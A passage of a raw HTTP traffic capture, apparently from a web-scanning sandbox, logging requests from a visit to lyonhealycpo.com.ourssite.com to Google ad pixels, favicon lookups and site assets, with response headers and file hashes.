1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Access-Control-Allow-Origin: *
Date: Tue, 13 Feb 2018 00:09:08 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
                                            GET /xbbe/match?xid=lsEcJlxiQQxNWceJ11Bt..mO HTTP/1.1 
Host: googleads.g.doubleclick.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/xbbe/pixel?d=COD5IRDn0jYY0IC5CDAB&v=APEucNWlf2nVGD7QVqn66Y9lRVBTes5IRW2ASGQmTA-x3cafgloPSVroOCiqfOxveidCWavRsq4O
Cookie: IDE=AHWqTUn3lF26de1_opJkTXr8zjib-QFQ1axrFncjdAYl-qW3PRFGHfrioGgj-omi

                                         
                                         172.217.21.130
HTTP/1.1 204 No Content
Content-Type: text/html; charset=UTF-8
                                        
X-Content-Type-Options: nosniff
Date: Tue, 13 Feb 2018 00:09:08 GMT
Server: cafe
Content-Length: 0
X-XSS-Protection: 1; mode=block
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
                                        
                                            GET /s2/favicons?domain_url=sellmore.jp HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/
Cookie: NID=123=SY0ep99IFzYfmY8HuVr2aFj4GxqLZ7GohvzD_vQmbLxr52rhOh6SsfEnhQ0sh7ZiKhs9IvxilG_WSMA-SOBbqYjKGz05Rhb_-IXaxvQTs35YYoAIxajweIXHCx6TUCf_

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Wed, 14 Feb 2018 00:09:08 GMT
Date: Tue, 13 Feb 2018 00:09:08 GMT
Cache-Control: public, max-age=86400
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGBA, non-interlaced
Size:   670
Md5:    cddb7e4b0014f3ce342add703eeb1882
Sha1:   db0779cadd9cab036df5a74fe8ba2a19b780a4bd
Sha256: a7daf9f34be136b04208e32096f27ed54efad6b4414e72b6ee7e25c30cffa121
                                        
                                            GET /s2/favicons?domain_url=aparafrance.com HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/
Cookie: NID=123=SY0ep99IFzYfmY8HuVr2aFj4GxqLZ7GohvzD_vQmbLxr52rhOh6SsfEnhQ0sh7ZiKhs9IvxilG_WSMA-SOBbqYjKGz05Rhb_-IXaxvQTs35YYoAIxajweIXHCx6TUCf_

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Wed, 14 Feb 2018 00:09:09 GMT
Date: Tue, 13 Feb 2018 00:09:09 GMT
Cache-Control: public, max-age=86400
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGB, non-interlaced
Size:   528
Md5:    3235ff0c28023fb473b491f3f2a0fab0
Sha1:   ab53a0a32cf94c178684103e2de1ef6cbab8b334
Sha256: 44fad7d93a792759a9cca12a5ad5a9532edb9e49a4b14117e3c3bea70e3b1b80
                                        
                                            GET /s2/favicons?domain_url=tvcs.org HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/
Cookie: NID=123=SY0ep99IFzYfmY8HuVr2aFj4GxqLZ7GohvzD_vQmbLxr52rhOh6SsfEnhQ0sh7ZiKhs9IvxilG_WSMA-SOBbqYjKGz05Rhb_-IXaxvQTs35YYoAIxajweIXHCx6TUCf_

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Wed, 14 Feb 2018 00:09:10 GMT
Date: Tue, 13 Feb 2018 00:09:10 GMT
Cache-Control: public, max-age=86400
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGBA, non-interlaced
Size:   738
Md5:    47b548ae9008c0577dcbb60cd0dd52d6
Sha1:   3a9aa3ffe5f56f976afb20b5cd137ea673de2ffe
Sha256: d24d11698e6a2bd0f1c39c975cf04cb96c3d90288965d267a1040dfefd2aa3ff
                                        
                                            GET /s2/favicons?domain_url=brignoles.fr HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/
Cookie: NID=123=SY0ep99IFzYfmY8HuVr2aFj4GxqLZ7GohvzD_vQmbLxr52rhOh6SsfEnhQ0sh7ZiKhs9IvxilG_WSMA-SOBbqYjKGz05Rhb_-IXaxvQTs35YYoAIxajweIXHCx6TUCf_

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Wed, 14 Feb 2018 00:09:14 GMT
Date: Tue, 13 Feb 2018 00:09:14 GMT
Cache-Control: public, max-age=86400
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGB, non-interlaced
Size:   461
Md5:    a1f62400058b23cbcf5f2facbd8b35b0
Sha1:   5f58797d8b94e81c279e87a5b24ed1bb858e8cae
Sha256: 33f60ca7ca944f358a6c7811b604dd35a6501b7c659e33f09cc59d9d31de15e8
                                        
                                            GET /images/email.png HTTP/1.1 
Host: ourssite.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         0.0.0.0
                                        


--- Additional Info ---
                                        
                                            GET /js/bootstrap.js HTTP/1.1 
Host: lyonhealycpo.com.ourssite.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         0.0.0.0
                                        


--- Additional Info ---
                                        
                                            GET /s2/favicons?domain_url=vancegenealogy.com HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/
Cookie: NID=123=SY0ep99IFzYfmY8HuVr2aFj4GxqLZ7GohvzD_vQmbLxr52rhOh6SsfEnhQ0sh7ZiKhs9IvxilG_WSMA-SOBbqYjKGz05Rhb_-IXaxvQTs35YYoAIxajweIXHCx6TUCf_

                                         
                                         0.0.0.0
                                        


--- Additional Info ---